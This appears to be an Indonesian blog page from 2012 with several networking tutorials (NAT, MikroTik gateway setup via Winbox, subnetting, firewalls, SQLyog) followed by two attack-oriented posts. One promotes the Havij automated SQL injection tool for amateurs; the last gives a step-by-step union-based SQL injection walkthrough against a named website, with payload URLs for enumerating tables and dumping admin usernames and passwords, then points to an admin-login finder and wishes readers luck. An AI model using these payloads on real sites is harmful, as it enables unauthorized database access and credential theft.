Kamis, 31 Mei 2012

NAT (Network Addess Translation)

                        NAT adalah pemetaan (translasi) alamat IP sehingga banyak IP private dalam sebuah LAN dapat mengakses IP Publik, dimana kita ketahui bahwa IP private hanya digunakan dalam LAN dan tidak bisa digunakan untuk IP publik. Melalui proses inilah, banyak komputer dapat mengakses internet karena adanya mekanisme NAT tersebut.
Intinya adalah, NAT mentranslasikan ip private seolah-olah  mengakses sebuah alamat host di internet menggunakan IP publik. Tanpa hal ini, tidak mungkin komputer lokal dapat mengakses internet. Sebagaimana juga diketahui alamat IP publik sudah semakin menipis, dan rencana kepada next generation melalui IPv6 sudah dilakukan, maka penggunaan NAT dirasakan sangat efektik, terutama dalam alokasi IP Address.
Topologi secara sederhana dapat dilihat seperti berikut :
LAN (Komputer Lokal) -> Switch/Hub -> Modem (NAT) -> Internet
                        Fungsi NAT terletak pada link out ke internet, dalam hal ini adalah Modem. Modem yang sering digunakan adalah Modem ADSL, walaupun jenis lain juga banyak digunakan. Modem ADSL menggunakan line PSTN telpon sebagai media penghubung ke provider. Dari modem inilah koneksi dapat dishare menggunakan switch/hub sehingga banyak komputer dapat mengakses internet.
Gambaran dari NAT :
Proses NAT
Diposting oleh di Tidak ada komentar:

Setting Mikrotik dengan winbox

                     Mikrotik sebagai gateway adalah salah satu konfigurasi yang paling sering ditemui selain sebagai manajemen bandwidth. Mikrotik sebagai gateway maksudnya adalah router mikrotik dimanfaatkan sebagai pintu gerbang tempat keluar masuknya paket dari dan ke internet, jadi semua paket akan dilewatkan melalui Mikrotik. Topologi yang digunakan pada jaringan model ini sangat sederhana, karena konfigurasi ini juga adalah konfigurasi dasar bagi seseorang yang ingin belajar tentang Mikrotik. Setiap orang yang ingin belajar tentang Mikrotik harus bisa melakukan konfigurasi ini. Berikut gambar yang saya buat untuk menggambarkan topologinya.
 
 
 

Settingan yang digunakan juga sangat sederhana. Berikut ini akan saya perlihatkan settingan Mikrotik sebagai gateway menggunakan Winbox. Disini saya menggunakan PC Router yang saya instal Mikrotik versi 3.20 dan saya pasangkan 2 buah kartu jaringan, dimana pada port pertama saya colokkan kabel yang berasal dari ISP, dan port kedua saya colokkan ke Switch yang terhubung ke LAN. Anda juga bisa menggunakan Router Board, sama saja.
1. Persiapan Awal
  • Hidupkan PC Router
  • Pastikan semua sudah terpasang dengan baik seperti topologi diatas.
  • Nyalakan salah satu komputer client untuk mensetting PC Router Mikrotik menggunakan Winbox. Kalau belum punya software Winbox, silahkan download di situs Mikrotiknya.
  • Jalankan Winboxnya.
  • Maka akan muncul jendela kecil, yaitu tampilan awal dari Winbox.
  • Klik tombol yang memiliki tiga titik […] disamping tombol [Connect]
  • Jika Routernya sudah terkoneksi dengan baik ke LAN, maka akan muncul sebuah list yang berisikan MAC Address dan IP Address.
  • Klik saja MAC Addressnya, lalu klik [Connect]
  • Maka akan muncul jendela admin dari router Mikrotik yang diremote menggunakan Winbox.
  • Apabila PC Router Mikrotik yang Anda gunakan ini sebelumnya sudah pernah disetting, maka lakukanlah reset ulang agar semua settingan kembali seperti awal pada saat belum dilakukan setting apapun. Caranya adalah klik tombol [New Terminal].
  • Maka akan muncul sebuah jendea yang memiliki latar belakang putih.
  • Ketikkanlah pada jendela putih itu tulisan, [system reset], jika diminta memilih Yes atai No, pilih saja Yes dengan menekan tombol [Y].
  • Setelah di reset biasanya router akan terdisconnect, konekkan kembali dengan langkah yang sudah dijelaskan sebelumnya.
  • Maka akan muncul jendela yang menanyakan, apakah akan menggunakan settingan default dari Mikrotik atau ingin menggunakan settingan sendiri. Klik [Remove Configuration] karena kita akan melakukan settingan sendiri.
  • Lalu agar mudah untuk diidentifikasi berikanlah nama untuk router yang digunakan. Dari [System] > [Identify]. Ketikkan nama router yang Anda inginkan, klik [Ok]. Disini saya memberikan nama [Gateway]. Sampai disini router sudah siap untuk dikonfigurasi.
2. Memberikan Komentar Pada Interface
Selanjutnya adalah memberikan komentar pada masing-masing interface agar mudah kita kenali, mana yang untuk ke ISP dan mana yang untuk ke LAN:
  • Klik [Interface].
  • Klik pada interface [ether1].
  • Klik icon yang bergambar kertas berwarna kuning, lalu isika komennya. Disini saya memberikan komen [TO INTERNET], karena interface ini yang akan menuju internet.
  • Begitu juga untuk [ether2]. Saya berikan komen [LOKAL]. Karena interface ini yang akan terhubung langsung ke jaringan lokal [LAN].
 

3. Memberikan IP Address
Untuk memberikan IP Address lakukan langkah berikut ini:
  • Klik [IP]
  • Pilih [Address]
  • Maka akan muncul jendela baru. Klik tanda [+] berwarna merah yang berada di sisi kiri atas dari jendela baru yang muncul tadi.
  • Ketikkan IP Address yang mengarah ke internet beserta subnetnya. Misalnya saya masukkan 10.10.1.1/24. Disini saya menggunakan simulasi, jadi jangan heran saya memasukkan IP Address seperti itu. Untuk Anda, silahkan Anda sesuaikan sendiri.
  • Setelah memasukkan, klik [Apply], maka akan muncul [Network Address] dan [Broadcast Addressnya].
  • Pilih interface yang mengarah ke internet, disini saya memilih [ether1].
  • Berikan komentar agar mudah dikenali dengan mengklik [Comment]. Berikan komentar Anda, disini saya memberikan komentar [IP Internet]
  • Klik [Ok]




Dengan langkah diatas kita telah menambahkan IP Address yang mengarah ke internet, selanjutnya adalah menambahkan IP Address yang mengarah ke jaringan lokal. Untuk caranya sama dengan langkah diatas, yaitu:
  • Klik lagi tanda [+] berwarna merah.
  • Ketikkan IP Address yang mengarah ke jaringan lokal beserta subnetnya. Misalnya saya masukkan 192.168.1.254/24. Untuk Anda, silahkan Anda sesuaikan dengan selera.
  • Setelah memasukkan, klik [Apply], maka akan muncul [Network Address] dan [Broadcast Addressnya].
  • Pilih interface yang mengarah ke lokal, disini saya memilih [ether2].
  • Berikan komentar agar mudah dikenali dengan mengklik [Comment]. Berikan komentar Anda, disini saya memberikan komentar [IP Lokal].
  • Klik [Ok]
4. Menambahkan Routing Table
Agar jaringan lokal bisa melakukan akses ke jaringan luar (internet), maka harus dibuat routing table. Agar paket memiliki arah tujuan yang jelas dan paket tersebut tahu bagaimana cara dia menuju tujuannya, caranya adalah:
  • Klik [IP]
  • Klik [Routes], maka akan terlihat 2 buah routing default.
  • Klik tanda [+] yang berwarna merah dibagian atas, maka akan muncul jendela baru.
  • Pada [Destination] biarkan dengan [0.0.0.0/0].
  • Pada [Gateway] isikan IP Address yang menjadi gateway dari router Anda. Disini saya memasukkan [10.10.1.254].
  • Tambahkan komentarnya.
  • Klik [Ok].




5. Menambahkan NAT Rule
Tujuan membuat NAT rule adalah agar paket bisa dilewatkan ke jaringan luar atau internet. Agar paket yang berasal dari interface lokal [ethe2] bisa sampai ke tujuannya dengan melewati interface internet [ether1]. Caranya adalah sebagai berikut:
  • Klik [IP].
  • Pilih [Firewall].
  • Masuk ke tab [NAT].
  • Klik tanda [+] yang berwarna merah, maka akan muncul jendela [New NAT Rule].
  • Pada [Chain] pilih [srcnat].
  • Pada [Out Interface] pilih interface yang mengarah ke internet, yaitu [ether1].
  • Masuk ke ta [Action].
  • Pada [Action] pilih [masquerade].
  • Klik [Apply].
  • Tambahkan komentar jika perlu. Penuli menambahkan komentar [NAT Rule].
  • Klik [Ok] jika sudah selesai.
6. Memasukkan DNS
DNS digunakan sebagai penerjemah dari nama domain ke alamat IP, dan sebaliknya, yaitu dari alamat IP ke nama domain. Jadi apabila pengguna mengetikkan google.com di web browser, maka itu berarti pengguna memanggil alamat IP dari google.com yaitu 74.125.71.103. caranya adalah sebagai berikut:
  • Klik [IP].
  • Pilih [DNS], maka akan muncul jendela [DNS].
  • Klik [Settings].
  • Pada [Primary DNS] masukkan DNS utama. Misalnya saya masukkan DNS Speedy yaitu [203.130.196.155].
  • Pada [Secondary DNS] masukkan DNS alternatif. Misalnya [8.8.8.8] yaitu DNS yang dibuat oleh Google.
  • Berikan centang pada [Allow Remote Requests].
  • Klik [Ok] jika sudah selesai.


7. Tes Konfigurasi
Setelah itu langkah terakhir dari seting di router adalah melakukan pengecekan apakah konfigurasi yang dilakukan sudah benar atau belum. Caranya adalah:
  • Klik [New Terminal].
  • Lakukan ping ke salah satu domain yang Anda inginkan. Misalnya [ping google.com]. jika sudah ada balasan, mkaa berarti router sudah berhasil terkoneksi ke internet.


8. Tes Konfigurasi di Klien
Selanjutnya adalah melakukan tes koneksi ke internet dari klien, namun sebelumnya IP Address dari klien harus diatur sesuai dengan konfigurasi yang telah dibuat. Berikut adalah konfigurasi klien sesuai dengan konfigurasi yang penulis buat dari Windows XP:
IP Address : 192.168.1.1
Subnet mask : 255.255.255.0
Default Gateway : 192.168.1.254
Preferred DNS : 203.130.196.155
Alternate : 8.8.8.8
Lakukan ping dari Command Prompt ke salah satu domain di internet, misalnya google.com dengan mengetikkan perintah [ping google.com]. jika ada reply itu berarti konfigurasi sudah berhasil. Jika belum coba lebih teliti lagi dalam melakukan konfiurasi.


 
Diposting oleh di Tidak ada komentar:

Subnetting

                        Subnetting merupakan teknik memecah network menjadi beberapa subnetwork yang lebih kecil. Subnetting hanya dapat dilakukan pada IP addres kelas A, IP Address kelas B dan IP Address kelas C. Dengan subnetting akan menciptakan beberapa network tambahan, tetapi mengurangi jumlah maksimum host yang ada dalam tiap network tersebut.
Beberapa alasan mengapa kita perlu melakukan subnetting, diantaranya adalah sebagai berikut:
  1. Untuk mengefisienkan alokasi IP Address dalam sebuah jaringan supaya bisa memaksimalkan penggunaan IP Address
  2. Mengatasi masalah perbedaan hardware dan media fisik yang digunakan daam suatu network, karena Router IP hanya dapat mengintegrasikan berbagai network dengan media fisik yang berbeda jika setiap network memiliki address network yang unik.
  3. Meningkatkan security dan mengurangi terjadinya kongesti akibat terlalu banyaknya host dalam suatu network 

Diposting oleh di Tidak ada komentar:

Minggu, 13 Mei 2012

Pengertian, Fungsi dan Cara Kerja Firewall Dalam Suatu Jaringan Komputer LAN dan WAN

PENGERTIAN FIREWALL
                      Firewall adalah sebuah sistem atau perangkat yang mengizinkan lalu lintas jaringan yang dianggap aman untuk melaluinya dan mencegah lalu lintas jaringan yang tidak aman. Umumnya, sebuah firewall diimplementasikan dalam sebuah mesin terdedikasi, yang berjalan pada pintu gerbang (gateway) antara jaringan lokal dan jaringan lainnya. Firewall umumnya juga digunakan untuk mengontrol akses terhadap siapa saja yang memiliki akses terhadap jaringan pribadi dari pihak luar. Saat ini, istilah firewall menjadi istilah generik yang merujuk pada sistem yang mengatur komunikasi antar dua jaringan yang berbeda. Mengingat saat ini banyak perusahaan yang memiliki akses ke Internet dan juga tentu saja jaringan korporat di dalamnya, maka perlindungan terhadap aset digital perusahaan tersebut dari serangan para hacker, pelaku spionase, ataupun pencuri data lainnya, menjadi esensial."

                      Oleh karena itu firewall adalah suatu mekanisme untuk melindungi keamanan jaringan komputer dengan menyaring paket data yang keluar dan masuk di jaringan. Paket data yang “baik” diperbolehkan untuk melewati jaringan dan paket dapa yang dianggap “jahat” tidak diperbolehkan melewati jaringan. Firewall dapat berupa perangkat lunak atau perangkat keras yang ditanam perangkat lunak yang dapat menfilter paket data. Firewall dapat juga berupa suatu sikap yang ditanam dan diajarkan kepada staf IT suatu perusahaan untuk tidak membocorkan data perusahaan kepada perusahaan. Ini untuk mencegah salah satu jenis hacking yaitu social enggeneering.

FUNGSI FIREWALL
A. Mengontrol dan mengawasi 
    paket data yang mengalir di jaringan Firewall harus dapat mengatur, memfilter dan mengontrol lalu lintas data yang diizin untuk mengakses jaringan privat yang dilindungi firewall. Firewall harus dapat melakukan pemeriksaan terhadap paket data yang akan melawati jaringan privat. Beberapa kriteria yang dilakukan firewall apakah memperbolehkan paket data lewati atau tidak, antara lain : 
1. Alamat IP dari komputer sumber
2. Port TCP/UDP sumber dari sumber.
3. Alamat IP dari komputer tujuan.
4. Port TCP/UDP tujuan data pada komputer tujuan
5. Informasi dari header yang disimpan dalam paket data.
B. Melakukan autentifikasi terhadap akses.
C. Applikasi proxy Firewall 
     mampu memeriksa lebih dari sekedar header dari paket data, kemampuan ini menuntut firewall untuk mampu mendeteksi protokol aplikasi tertentu yang spesifikasi.
D. Mencatat setiap transaksi kejadian yang terjadi di firewall
      Ini Memungkinkan membantu sebagai pendeteksian dini akan penjebolan jaringan.

CARA KERJA FIREWALL
                       Jika kamu menggunakan internet secara teratur setiap hari,atau komputer kamu terhubung dengan internet setiap kali menggunakannya, maka kamu harus memiliki sebuah firewall yang aktif di komputer. Firewall dapat melindungi komputer kamu dari serangan hacker dan situs web tertentu yang telah diblok oleh firewall tersebut. 
Firewall pada dasarnya merupakan sebuah penghalang antara komputer anda (jaringan)dengan internet. Firewall bisa diumpamakan sebuah satpam yang menjaga pintu gerbang rumah anda untuk menyaring pengunjung yang datang ke tempat anda.
                        Dan apabila firewall menemukan data  yang dicurigai membawa hal berbahaya dan dapat merusak, seperti virus, spyware, dan trojan, firewall akan melarangnya untuk keluar atau masuk ke dalam jaringan. Dalam mengontrol lalu lintas keluar masuk data dalam jaringan, firewall menggunakan salah satu atau ketiga metode berikut ini :
1. Packet Filtering – Paket data diperiksa menggunakan seperangkat aturan penyaringan. Paket yang lulus proses penyaringan diizinkan untuk meneruskan perjalanannya, sedangkan yang tidak lulus penyaringan akan dihapus.
2. Proxy Service – Data yang berasal dari Internet diterima oleh firewall kemudian diteruskan kepada komputer yang me-request-nya, begitu juga sebaliknya.
3. Stateful Inspection – Metode membandingkan bagian kunci dari paket data tersebut dengan database data-data terpercaya. Data yang keluar dari firewall ditandai dengan ciri-ciri khusus, selanjutnya data yang masuk akan dibandingkan dengan ciri-ciri khusus tersebut. Jika dalam proses perbandingan terdapat kecocokan, data diizinkan masuk. Jika terdapat ketidakcocokan, firewall akan menghapus data tersebut.

Mengatur Setting Firewall
Administrator jaringan dapat menambah dan mengurangi saringan yang digunakan pada firewall, antara lain :
1. Alamat IP – Setiap mesin, tidak hanya komputer, yang terhubung dengan Internet memiliki alamat unik yang dinamakan IP. Jika sebuah alamat IP terlalu banyak mengirimkan paket data yang mencurigakan, firewall dapat memblokir semua paket data dari alamat IP tersebut.
2. Nama Domain – Semua server di Internet memiliki nama domain untuk memudahkan kita menghapalnya daripada harus menggunakan sederetan alamat IP, misalnya Anda tentu lebih mudah menghapal nama domain pcmedia.co.id daripada angka 202.158.39.108, bukan? Firewall dapat memblokir semua akses menuju nama domain tertentu, atau hanya mengizinkan akses kepada beberapa nama domain tertentu.
3. Protokol – Dalam berkomunikasi, sesama komputer menggunakan jalur-jalur tertentu. Jalur-jalur komunikasi tersebut dikenal dengan nama protokol. Sebagai contoh, untuk berkomunikasi dengan web server, web browser menggunakan jalur HTTP. Firewall dapat menyaring lalu lintas data pada beberapa protokol yang jamak digunakan semisal HTTP, FTP, UDP, ICMP, SMTP, SNMP, telnet, dan lain-lain.
4. Port – Setiap server menggunakan port-port bernomor untuk menyediakan layanan di Internet. Satu port untuk satu layanan. Sebagai contoh, jika sebuah server menjalankan web server dan FTP server, biasanya web server akan menggunakan port 80, dan FTP server menggunakan port 21. Firewall dapat memblokir akses ke port 21 untuk melarang akses FTP dari dan ke komputer yang dilindunginya.
5. Kata-kata atau Frase tertentu – Firewall dapat memblokir setiap data keluar dan masuk yang mengandung kata atau frase tertentu dengan cara mengendus (sniff) setiap paket data dan mencocokkan setiap kata atau frase yang ada di dalamnya dengan daftar black list. Sebagai contoh, administrator dapat memasukkan kata-kata porn, sex, nude, dan kata-kata berbau pornografi lainnya untuk melarang setiap komputer mengakses website porno.
Diposting oleh di Tidak ada komentar:

Pengenalan SQLyog

                        SQLyog adalah aplikasi client MySQL yang sangat populer digunakan di Indonesia. Aplikasi ini memiliki banyak fitur yang memudahkan pengguna melakukan administrasi maupun melakukan pengolahan data MySQL.

                         Versi aplikasi ini ada yang gratis dan open source dan ada yang berbayar. Versi open source dari SQLyog ini dapat diunduh disini. Pilihlah versi stabil terbaru yang terdapat pada daftar tersebut dan lakukan instalasi layaknya aplikasi setup Windows lainnya.



Berikut adalah contoh penggunaan koneksi ke host MySQL dan melihat objek-objek database yang ada dengan mudah 
    
   1.  Jalankan SQLyog.
   2.  Jika ada komentar "Upgrade to Professional/Enterprise/Ultimate edition now", klik tombol "Continue..." saja.
   3.  Pada dialog "Connect to MySQL host" klik tombol "New", namakan koneksi tersebut misalkan dengan "localhost"
   4.  Masukkan rincian koneksi dan klik tombol "Connect"




   5. Jika koneksi berhasil akan muncul layar kerja seperti gambar di bawah ini dengan panel kiri adalah bagian
       "Object  Browser" yang berisi daftar informasi dari semua objek database kita.


   6.  Klik salah satu table dari database kita, kemudian klik tab "Table Data" pada panel kanan bawah. Row-row data dari
        table tersebut akan segera terbaca.


   7. Eksekusi query di panel kanan atas, tekan F9 (Execute) dan hasilnya dapat dilihat di panel kanan bawah.

 
 
  8. Selesai
 
Diposting oleh di Tidak ada komentar:

Aplikasi Havij SQL Injection

                Havij SQL Injection adalah alat otomatis yang membantu penguji penetrasi untuk menemukan dan mengeksploitasi kerentanan SQL Injection di halaman web. Hal ini dapat mengambil keuntungan dari sebuah aplikasi web yang rentan. Dengan menggunakan software ini pengguna dapat melakukan sidik jari back-end database, mengambil pengguna DBMS dan hash password, dump tabel dan kolom, mengambil data dari database, menjalankan pernyataan SQL dan bahkan mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi.

               Kekuatan Havij yang membuatnya berbeda dari perkakas semacam itu adalah metode injeksi nya. Tingkat keberhasilan lebih dari 95% pada injectiong sasaran rentan menggunakan Havij. User friendly GUI (Graphical User Interface) dari Havij dan pengaturan otomatis dan pendeteksian membuatnya mudah digunakan bagi semua orang bahkan pengguna amatir.
Diposting oleh di 1 komentar:

Pengertian SQL Injection dan Berikut Langkah-langkahnya

                      SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection 
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ‟ dan juga karakter double minus --yang
     menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Contoh sintak SQL dalam PHP
 1)  $SQL = “select * from login where username =‟$username‟ and password =
      „$password‟”; , {dari GET atau POST variable }
2) isikan password dengan string ‟ or ‟‟ = ‟
3) hasilnya maka SQL akan seperti ini = “select * from login where username
   = ‟$username‟ and password=‟pass‟ or „=′”; , { dengan SQL ini hasil selection akan
selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Contoh sintak SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :
    select*from user where name = 'bob' and password = 'robot'
     berubah menjadi
    select*from user where name = 'bob'--' and password ='xxx'

Berikut Adalah Langkah-Langkah Menggunakan SQL Injection

1.  Step Satu

     Carilah target, misalkan: http//www.snipp55.com/berita.php?id=100
     Tambahkan karakter ( ‘ ) pada akhir url atau menambahkan karakter ( – ) untuk melihat apakah ada pesan error.
     contoh : http//www.snipp55.com/berita.php?id=100′ atau
                     http//www.snipp55.com/berita.php?id=-100
     sehingga muncul pesan error seperti berikut :
     ” Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/classes/storedProcedures/GetArticleData.class.php on line 92 “
     (dan masih banyak lagi pesan error yg lainnya)


2. Step Dua

     Mencari dan menghitung jumlah table yang ada dalam databasenya, gunakan perintah : order by
     contoh : http//www.snipp55.com/berita.php?id=-100+order+by+1–  atau
                     http//www.snipp55.com/berita.php?id=-100+order+by+1/*
     ceklah secara step by step (satupersatu)
    misal:
    http//www.snipp55.com/berita.php?id=-100+order+by+1–
    http//www.snipp55.com/berita.php?id=-100+order+by+2–
    http//www.snipp55.com/berita.php?id=-100+order+by+3–
    http//www.snipp55.com/berita.php?id=-100+order+by+4– dst
    sehingga muncul pesan error
    misal pesan errornya muncul di table 9 :
              http//www.snipp55.com/berita.php?id=-100+order+by+9–
              berarti table yang terdapat dalam database adalah 8
              menjadi http//www.snipp55.com/berita.php?id=-100+order+by+8–

3. Step Tiga

     Mencari nomor keberuntungan dengan menggunakan perintah union select
     karena tadi tablenya hanya ada 8
     maka: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–
     ok seumpama yg keluar adalah angka 5
     maka gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai.
     masukan perintah tsb pada angka yg keluar tadi
     misal: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
     http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
     lalu lihat versi database yg digunakan seumpama versi 4 maka tinggalkan saja karena dalam ver 4 ini kita harus menebak
     sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema
     jika versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan 
     perintah From+Information_schema


4. Step Empat

    menampilkan table yg ada pada web tsb dengan
    perintah group_concat(table_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
   perintah +from+information_schema.tables+where+table_schema=database()–        >>> dimasukan setelah angka terakhir
   Contoh :
    http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–
ibaratkan yang muncul adalah table  “admin”


5. Step Lima

    menampilkan kolom yang terdapat di table “admin”
    perintah group_concat(column_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
    perintah +from+information_schema.columns+where+table_name=Oxhexa–       >>> dimasukan setelah angka terakhir
    Contoh :
    http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Oxhexa–
    pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    website yg digunakan untuk konversi :
    contoh kata yg ingin di konversi yaitu “admin” (tanpa tanda kutip) maka akan menjadi 61646d696e
maka : http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Ox61646D696E–
    ibaratkan yang muncul adalah column username,password,email


6. Step Enam

     memunculkan apa yg tadi telah dikeluarkan dari column yaitu dengan cara
    perintah concat_ws(Ox3a,hasil isi column yg akan dikeluarkan)         >>> dimasukan pada angka keberuntungan yg keluar tadi
    perintah +from+(nama table berasal)          >>> dimasukan setelah angka terakhir
    Contoh :
  http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,column yang akan dilihat isinya),6,7,8+from+(nama table)–
    contoh column yang keluar td adalah column username,password,email
    Maka :
    http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,username,Ox3a,password,Ox3a,email),6,7,8+from+admin–
    contoh yang keluar :
    admin:an4kal4y:alay_alay@alay.com
    cara membaca nya seperti berikut :
    username : admin
    password : an4kal4y
    email : alay_alay@alay.com


7.  Step Tujuh  

      tahap terakhir yang harus dilakukan adalah mencari halaman admin atau login (adminlogin).
      website yang menyediakan program pencarian login admin :
      http://revtan.site40.net/admin/?
      Selamat Mencoba
 

Diposting oleh di 1 komentar:
Langganan: Postingan (Atom)